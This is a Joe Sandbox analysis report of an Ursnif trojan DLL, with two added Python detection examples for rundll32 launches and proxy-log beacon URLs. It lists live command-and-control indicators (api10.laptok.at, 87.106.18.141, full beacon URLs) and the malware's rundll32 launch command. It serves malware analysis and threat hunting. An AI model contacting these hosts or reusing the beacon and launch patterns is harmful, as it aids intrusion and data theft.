Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3684 CREDAT:17410 /prefetch:2
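The rows above show the sandbox harness loaddll32.exe spawning cmd.exe, which in turn runs rundll32.exe against the submitted DLL by ordinal (#1) from the user's Desktop. The Python below is an added example, not part of the Joe Sandbox report: it applies that pattern as a hunting rule over process-creation records, flagging rundll32 launches whose DLL sits in a user-writable path, whose export is given by ordinal, or whose parent is cmd.exe. The record tuples and the benign control line are constructed for the example. In production telemetry (for instance Sysmon event ID 1) the parent of cmd.exe will be whatever delivered the DLL, since loaddll32.exe exists only inside the sandbox.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed records in the shape (parent image, child image, child command line),
# taken from the "Process created" rows above plus one benign control line.
RECORDS = [
    ("C:\\Windows\\System32\\loaddll32.exe", "C:\\Windows\\SysWOW64\\cmd.exe",
     "cmd.exe /C rundll32.exe 'C:\\Users\\user\\Desktop\\2e.dll',#1"),
    ("C:\\Windows\\SysWOW64\\cmd.exe", "C:\\Windows\\SysWOW64\\rundll32.exe",
     "rundll32.exe 'C:\\Users\\user\\Desktop\\2e.dll',#1"),
    # benign control (constructed): a system DLL called by export name from explorer
    ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\rundll32.exe",
     'rundll32.exe "C:\\Windows\\System32\\shell32.dll",Control_RunDLL'),
]

# rundll32 syntax is  rundll32.exe <dll>,<export>  where <export> may be #<ordinal>.
# The sandbox prints the DLL path in single quotes; real logs usually use double quotes.
_RUNDLL_RE = re.compile(
    r"""rundll32(?:\.exe)?\s+['"]?(?P<dll>[^'",]+?)['"]?\s*,\s*(?P<export>#?\w+)""",
    re.IGNORECASE,
)
# Locations an unprivileged user can write to; extend to match your environment.
_USER_WRITABLE_RE = re.compile(
    r"^[a-z]:\\(?:users|programdata)\\|\\appdata\\|\\temp\\", re.IGNORECASE
)


@dataclass
class Finding:
    dll: str
    export: str
    reasons: List[str] = field(default_factory=list)


def inspect_rundll32(parent_image: str, image: str, cmdline: str) -> Optional[Finding]:
    """Return a Finding when a rundll32 launch carries suspicious traits, else None."""
    if not image.lower().endswith("\\rundll32.exe"):
        return None
    m = _RUNDLL_RE.search(cmdline)
    if not m:
        return None
    dll, export = m.group("dll"), m.group("export")
    reasons = []
    if _USER_WRITABLE_RE.search(dll):
        reasons.append("dll in user-writable path")
    if export.startswith("#"):
        reasons.append("export called by ordinal")
    if parent_image.lower().endswith("\\cmd.exe"):
        reasons.append("parent is cmd.exe")
    return Finding(dll, export, reasons) if reasons else None


def findings(records) -> List[Finding]:
    """Run the check over (parent, image, cmdline) tuples and keep the hits."""
    return [f for f in (inspect_rundll32(*r) for r in records) if f is not None]


if __name__ == "__main__":
    for f in findings(RECORDS):
        print(f.dll, f.export, "; ".join(f.reasons))
```

Only the rundll32.exe record itself is flagged; the cmd.exe record that merely contains the same command line is skipped because the check keys on the launched image, which keeps the rule from firing twice per chain.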
Source: C:\Windows\System32\loaddll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{C2243AE9-2779-11EC-90EB-ECF4BBEA1588}.dat
Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Temp\~DF302033FC2C26A542.TMP
Source: classification engine | Classification label: mal100.troj.winDLL@11/19@2/1
Source: C:\Program Files\internet explorer\iexplore.exe | File read: C:\Users\desktop.ini
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_10002193 push ecx; ret 0_2_100021A3
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_10002140 push ecx; ret 0_2_10002149
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00FAE6BE push esp; retf 0_2_00FAE6BF
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00FAAC00 push ecx; ret 0_2_00FAAC09
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00FAE1AF push ebx; ret 0_2_00FAE1B2
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00FAE163 push edx; iretd 0_2_00FAE164
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00FAAF33 push ecx; ret 0_2_00FAAF43
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00D5BAD0 push edx; ret 0_2_00D5BBD4
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00D53C54 push eax; iretd 0_2_00D53C4B
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00D53C32 push eax; iretd 0_2_00D53C4B
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00D5197F push ds; retf 0_2_00D5198D
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00D516B6 push ecx; ret 0_2_00D516B7
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00D552B6 push esp; iretd 0_2_00D552D5
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00D55EB0 push 0E0634C7h; retf 0_2_00D55EB5
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00D53205 push cs; retf 0_2_00D53206
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00D53FFB pushad ; iretd 0_2_00D5400E
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00D533A6 push ds; ret 0_2_00D533BB
Source: 2e.dll | Static PE information: section name: .data2

                      Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match | File source: 00000000.00000003.803227069.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.899624754.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.899679328.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.803315900.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.899458212.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.899498607.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.899414511.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.901603317.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1203601349.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.803348643.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.803173940.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.803390693.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.899563679.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.803371540.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.899592894.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.803277362.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.803130026.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.899658912.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 796, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 4872, type: MEMORYSTR
Source: Yara match | File source: 0.2.loaddll32.exe.e00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.rundll32.exe.30e0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.e00000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.rundll32.exe.2f90000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.rundll32.exe.2f40000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.4ce94a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.31494a0.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.rundll32.exe.30e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.rundll32.exe.2f90000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.d60000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.10000000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.fa0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.10000000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.31494a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.4ce94a0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.d60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.901240382.0000000002F90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1203393631.0000000003149000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.901405735.00000000030E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.901669349.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1202749084.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.900182748.0000000004CE9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1202777990.0000000000E00000.00000040.00000001.sdmp, type: MEMORY
Source: C:\Windows\System32\loaddll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\loaddll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00FA7DD8 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 0_2_00FA7DD8
Source: C:\Windows\System32\loaddll32.exe | Memory protected: page execute read | page guard
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\2e.dll',#1
Source: loaddll32.exe, 00000000.00000002.1203164560.0000000001760000.00000002.00020000.sdmp | Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.1203164560.0000000001760000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.1203164560.0000000001760000.00000002.00020000.sdmp | Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.1203164560.0000000001760000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
Source: C:\Windows\System32\loaddll32.exe | Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, 0_2_10001B13
Source: C:\Windows\System32\loaddll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00FA8B98 cpuid 0_2_00FA8B98
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_1000166F CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 0_2_1000166F
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_10001000 GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 0_2_10001000
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00FA8B98 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 0_2_00FA8B98

                      Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match | File sources: the same memory dumps, process memory spaces and unpacked PE files listed under "Hooking and other Techniques for Hiding and Protection" above (the list is identical and is not repeated here).

                      Remote Access Functionality:

Yara detected Ursnif
Source: Yara match | File sources: the same memory dumps, process memory spaces and unpacked PE files listed under "Hooking and other Techniques for Hiding and Protection" above (the list is identical and is not repeated here).

                      Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation2 | DLL Side-Loading1 | Process Injection12 | Masquerading1 | OS Credential Dumping | System Time Discovery1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | DLL Side-Loading1 | Disable or Modify Tools1 | LSASS Memory | Process Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection12 | Security Account Manager | Account Discovery1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information1 | NTDS | System Owner/User Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol2 | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Rundll321 | LSA Secrets | File and Directory Discovery2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing1 | Cached Domain Credentials | System Information Discovery33 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | DLL Side-Loading1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |

Reading the matrix: a technique with digits appended (for example Process Injection12, Rundll321, System Information Discovery33) is one that signatures in this report mapped to, the digits being the report's hit badges reproduced as extracted; entries without a badge are the matrix's standard fillers and do not indicate observed behaviour.

                      Behavior Graph

Behavior Graph ID: 498882 | Sample: 2e.dll | Start date: 07/10/2021 | Architecture: WINDOWS | Score: 100
(The graph image itself is not reproduced here; its nodes and edges are rendered as text.)
Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Found malware configuration; 3 other signatures
Process chains:
- loaddll32.exe [Writes or reads registry keys via WMI; Writes registry values via WMI] -> cmd.exe -> rundll32.exe [Writes registry values via WMI]
- iexplore.exe -> iexplore.exe (child)
- iexplore.exe -> iexplore.exe (child) -> api10.laptok.at (87.106.18.141; client ports 49792, 49793, 49823; ONEANDONE-AS, Brauerstrasse 48, DE, Germany)


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label
2e.dll | 66% | Virustotal |
2e.dll | 41% | Metadefender |
2e.dll | 83% | ReversingLabs | Win32.Trojan.Ursnif
2e.dll | 100% | Avira | TR/AD.Ursnif.rluee

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

Source | Detection | Scanner | Label
2.2.rundll32.exe.30e0000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8
0.2.loaddll32.exe.e00000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8
2.2.rundll32.exe.10000000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8
0.2.loaddll32.exe.10000000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8

                      Domains

Source | Detection | Scanner | Label
api10.laptok.at | 14% | Virustotal |

                      URLs

Source | Detection | Scanner | Label
http://api10.laptok.at/api1/9cxo6IB1Y7pDV3pIFs/pxY2OU074/uQoS3fQTrkAvwEYVEAv9/V9besIl3CRfg1NE1PHO/5acsxz5qxHDpv8YBmMuvj7/KGpLxQcloIDfE/SXYboMNK/ZGVNwVWGfnWgXZ7LibENrAZ/rGu1uarUfj/FSkhkIGZ0I6ED2ThT/iotSrHt6InUD/umvaUlfqIMb/01G4_2FdSHt_2F/JPI5oPhpcVsnT5eUGv8s0/LSKuaJdd_2FAe_2F/vQT2v29m9TEniEM/b63Yg6FSycj4oUXo8F/FUMOEIDKM/JTkYuf9RIKrVWGrferoc/GwDXbtZ7LjM2klfVose/Bk9CRR6n/Lu2z5l | 0% | Avira URL Cloud | safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | 0% | URL Reputation | safe
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
http://api10.laptok.at/api1/9cxo6IB1Y7pDV3pIFs/pxY2OU074/uQoS3fQTrkAvwEYVEAv9/V9besIl3CRfg1NE1PHO/5a | 0% | Avira URL Cloud | safe
http://api10.laptok.at/api1/DGBXE3uXrLTWiBjVyk/VC7Ta4hFF/xsAyuQ20ayjuhLgkiSkm/m3K_2FmdKtkRCW_2B7u/tX | 0% | Avira URL Cloud | safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | 0% | URL Reputation | safe
https://sectigo.com/CPS0D | 0% | URL Reputation | safe
http://api10.laptok.at/api1/9cxo6IB1Y7pDV3pIFs/pxY2OU074/uQoS3fQTrkAvwEYVEAv9/V9besIl3CRfg1NE1P | 0% | Avira URL Cloud | safe
http://www.wikipedia.com/ | 0% | URL Reputation | safe
http://api10.laptok.at/favicon.ico | 0% | Avira URL Cloud | safe
http://api10.laptok.at/api1/DGBXE3uXrLTWiBjVyk/VC7Ta4hFF/xsAyuQ20ayjuhLgkiSkm/m3K_2FmdKtkRCW_2B7u/tXHmCyMHbP9slqB1L8zpaC/nfhvJ6s58irru/pNJBMQ_2/B9Q8wSf7euVWpy0kLFFtWzz/vAwDCO_2Fo/3v4FyeGSRuSjMupWH/_2BEQ6znA7PT/8caxgyO1tr2/cTDPOBy_2FHAvv/tgKZ2JSY8uZo5PCTnq6VX/_2F2Vff20_2Fr9ux/TFmLX_2BIHd1Zmp/Jqw_2BLpi2pH8Zi61P/xEqI3ryES/n6BjkuL3N3RbBmMCK9xy/loeot0z7U9fUAU78A6C/ywgL0kQB0_2BMve6S_2Flf/2SujN_2Fl/B | 0% | Avira URL Cloud | safe

Note on the sectigo.com entries: they are CRL, OCSP and CPS pointers from the certificate chain embedded in 2e.dll, not contacted infrastructure, and the stray characters after each (0t, 0, 0#, 0D) are the adjacent DER bytes that the string extractor picked up; do not copy them into blocklists. The truncated api10.laptok.at variants (ending in /5a, /tX and /V9besIl3CRfg1NE1P) are partial copies of the two full beacon URLs recovered from browser recovery files and memory.

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
api10.laptok.at | 87.106.18.141 | true | true | | unknown

                      Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://api10.laptok.at/api1/9cxo6IB1Y7pDV3pIFs/pxY2OU074/uQoS3fQTrkAvwEYVEAv9/V9besIl3CRfg1NE1PHO/5acsxz5qxHDpv8YBmMuvj7/KGpLxQcloIDfE/SXYboMNK/ZGVNwVWGfnWgXZ7LibENrAZ/rGu1uarUfj/FSkhkIGZ0I6ED2ThT/iotSrHt6InUD/umvaUlfqIMb/01G4_2FdSHt_2F/JPI5oPhpcVsnT5eUGv8s0/LSKuaJdd_2FAe_2F/vQT2v29m9TEniEM/b63Yg6FSycj4oUXo8F/FUMOEIDKM/JTkYuf9RIKrVWGrferoc/GwDXbtZ7LjM2klfVose/Bk9CRR6n/Lu2z5l | true | Avira URL Cloud: safe | unknown
http://api10.laptok.at/favicon.ico | true | Avira URL Cloud: safe | unknown
http://api10.laptok.at/api1/DGBXE3uXrLTWiBjVyk/VC7Ta4hFF/xsAyuQ20ayjuhLgkiSkm/m3K_2FmdKtkRCW_2B7u/tXHmCyMHbP9slqB1L8zpaC/nfhvJ6s58irru/pNJBMQ_2/B9Q8wSf7euVWpy0kLFFtWzz/vAwDCO_2Fo/3v4FyeGSRuSjMupWH/_2BEQ6znA7PT/8caxgyO1tr2/cTDPOBy_2FHAvv/tgKZ2JSY8uZo5PCTnq6VX/_2F2Vff20_2Fr9ux/TFmLX_2BIHd1Zmp/Jqw_2BLpi2pH8Zi61P/xEqI3ryES/n6BjkuL3N3RbBmMCK9xy/loeot0z7U9fUAU78A6C/ywgL0kQB0_2BMve6S_2Flf/2SujN_2Fl/B | true | Avira URL Cloud: safe | unknown

                      URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | 2e.dll | false | URL Reputation: safe | unknown
http://www.nytimes.com/ | msapplication.xml3.15.dr | false | | high
http://ocsp.sectigo.com0 | 2e.dll | false | URL Reputation: safe | unknown
http://api10.laptok.at/api1/9cxo6IB1Y7pDV3pIFs/pxY2OU074/uQoS3fQTrkAvwEYVEAv9/V9besIl3CRfg1NE1PHO/5a | {DD28BAED-2779-11EC-90EB-ECF4BBEA1588}.dat.21.dr, ~DFB9EDA9C4DE41A518.TMP.21.dr | true | Avira URL Cloud: safe | unknown
http://api10.laptok.at/api1/DGBXE3uXrLTWiBjVyk/VC7Ta4hFF/xsAyuQ20ayjuhLgkiSkm/m3K_2FmdKtkRCW_2B7u/tX | {C2243AEB-2779-11EC-90EB-ECF4BBEA1588}.dat.15.dr | true | Avira URL Cloud: safe | unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | 2e.dll | false | URL Reputation: safe | unknown
http://www.youtube.com/ | msapplication.xml7.15.dr | false | | high
https://sectigo.com/CPS0D | 2e.dll | false | URL Reputation: safe | unknown
http://api10.laptok.at/api1/9cxo6IB1Y7pDV3pIFs/pxY2OU074/uQoS3fQTrkAvwEYVEAv9/V9besIl3CRfg1NE1P | loaddll32.exe, 00000000.00000002.1203164560.0000000001760000.00000002.00020000.sdmp | true | Avira URL Cloud: safe | unknown
http://www.wikipedia.com/ | msapplication.xml6.15.dr | false | URL Reputation: safe | unknown
http://www.amazon.com/ | msapplication.xml.15.dr | false | | high
http://www.live.com/ | msapplication.xml2.15.dr | false | | high
http://www.reddit.com/ | msapplication.xml4.15.dr | false | | high
http://www.twitter.com/ | msapplication.xml5.15.dr | false | | high
http://www.google.com/ | msapplication.xml1.15.dr | false | | high

                                    Contacted IPs


                                    Public

IP | Domain | Country | ASN | ASN Name | Malicious
87.106.18.141 | api10.laptok.at | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
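The indicators in the Contacted Domains, Contacted URLs and Contacted IPs tables above are what a responder would sweep proxy logs for. The script below is an added example and is not part of the Joe Sandbox report or its tooling: it copies the domain and IP from those tables, and derives a host-independent path heuristic from the shape of the listed beacon URLs (a fixed `/api1/` first segment, a long run of base64-looking segments, and the literal tokens `_2F` and `_2B`). Treating those tokens as stand-ins for the base64 characters `/` and `+` is an assumption, not something the report states. The log format, the log lines and the function names (`classify_url`, `scan_log`) are constructed for the demo.

```python
"""
Proxy-log triage against the indicators in this report.

Added example, not part of the Joe Sandbox report: the domain, IP and URL
shapes come from the "Contacted Domains / URLs / IPs" tables; the log format
and the log lines are constructed for the demo.
"""
import re
from urllib.parse import urlsplit

# Indicators copied from the report's Contacted Domains / Contacted IPs tables.
IOC_DOMAINS = {"api10.laptok.at"}
IOC_IPS = {"87.106.18.141"}

# Shape of the beaconing URLs listed under Contacted URLs: a fixed first
# segment (/api1/), then a long run of slash-separated base64-looking segments
# containing the literal tokens _2F and _2B. Assumption: those tokens are
# substitutions for the base64 characters '/' and '+', which ordinary
# base64-in-path content would not carry in that form.
SEGMENT = r"[A-Za-z0-9_]+"
C2_PATH_RE = re.compile(r"^/api1/(?:%s/){6,}%s$" % (SEGMENT, SEGMENT))
ESCAPED_B64_RE = re.compile(r"_2[FB]")

# Constructed log format: "<timestamp> <client-ip> <method> <url> <status>".
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$"
)


def classify_url(url):
    """Return the set of rule names that fire for one URL (empty set = clean)."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    reasons = set()
    if host in IOC_DOMAINS:
        reasons.add("ioc-domain")
    if host in IOC_IPS:
        reasons.add("ioc-ip")
    # The path rule ignores the host, so it also catches the same URL shape on
    # infrastructure the report does not list.
    if C2_PATH_RE.match(parts.path) and ESCAPED_B64_RE.search(parts.path):
        reasons.add("c2-path-pattern")
    return reasons


def scan_log(lines):
    """Yield (client, url, sorted rule names) for every log line that matches."""
    for line in lines:
        m = LOG_RE.match(line.rstrip("\n"))
        if not m:
            continue  # unparsable line: skip it rather than abort the sweep
        reasons = classify_url(m["url"])
        if reasons:
            yield m["client"], m["url"], sorted(reasons)


# Constructed sample: two benign lines, two URLs taken from this report, and
# one URL from the report's "Joe Sandbox View" context table on another host.
SAMPLE_LOG = [
    "2021-10-07T16:19:01Z 10.0.0.12 GET http://www.wikipedia.com/ 200",
    "2021-10-07T16:19:05Z 10.0.0.12 GET http://api10.laptok.at/api1/9cxo6IB1Y7pDV3pIFs/pxY2OU074/uQoS3fQTrkAvwEYVEAv9/V9besIl3CRfg1NE1PHO/5acsxz5qxHDpv8YBmMuvj7/KGpLxQcloIDfE/SXYboMNK/ZGVNwVWGfnWgXZ7LibENrAZ/rGu1uarUfj/FSkhkIGZ0I6ED2ThT/iotSrHt6InUD/umvaUlfqIMb/01G4_2FdSHt_2F/JPI5oPhpcVsnT5eUGv8s0/LSKuaJdd_2FAe_2F/vQT2v29m9TEniEM/b63Yg6FSycj4oUXo8F/FUMOEIDKM/JTkYuf9RIKrVWGrferoc/GwDXbtZ7LjM2klfVose/Bk9CRR6n/Lu2z5l 200",
    "2021-10-07T16:19:06Z 10.0.0.12 GET http://api10.laptok.at/favicon.ico 404",
    "2021-10-07T16:21:40Z 10.0.0.31 GET http://far.gaploop.at/api1/m9Nm6sQ5MZ2/kV1dHuUchwgj0p/w9B514uuWuNRu_2Fovw1B/iJjn_2FjOcMhSdO6/hY1viFbhIYH_2BS/FrMYbmCHgkAwm_2Btu/e29igvEBi/gLOHtqdBI_2B3sibC3Cg/z_2F8IFoCH_2BWJVdUY/ri7hwzyuAx2q5RHXJmbXhc/ygopWPWJKwti5/IOOS1u46/4ZXFc4Ok4SPekiO7ot2QyT_/2FJdMyYfAP/7FTqw0rQZL_2B1pan/wh8ruTp3dham/UlLIzAZ_2Fn/esHGZHp93qljV_/0A_0DvFEgD08oveRu1RDL/3nPBhZLduxccr2_2/FS5iRLSxGBo44/0xUc 200",
    "2021-10-07T16:22:00Z 10.0.0.31 GET http://cdn.example.invalid/a1/b2/c3/d4/e5/f6/g7/h8 200",
]

if __name__ == "__main__":
    for client, url, reasons in scan_log(SAMPLE_LOG):
        print("%s %s %s" % (client, ",".join(reasons), url[:60]))
```

Running the sample flags three of the five lines: the report's beacon URL fires on both the domain indicator and the path pattern, the favicon request fires on the domain alone, and the far.gaploop.at URL fires on the path pattern only, which is the case an exact-match blocklist built from this one report would miss. Expect the path heuristic to need tuning against real traffic before it is used as an alert rather than a triage filter.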

                                    General Information

                                    Joe Sandbox Version:33.0.0 White Diamond
                                    Analysis ID:498882
                                    Start date:07.10.2021
                                    Start time:16:18:46
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 8m 53s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Sample file name:2e.dll
                                    Cookbook file name:default.jbs
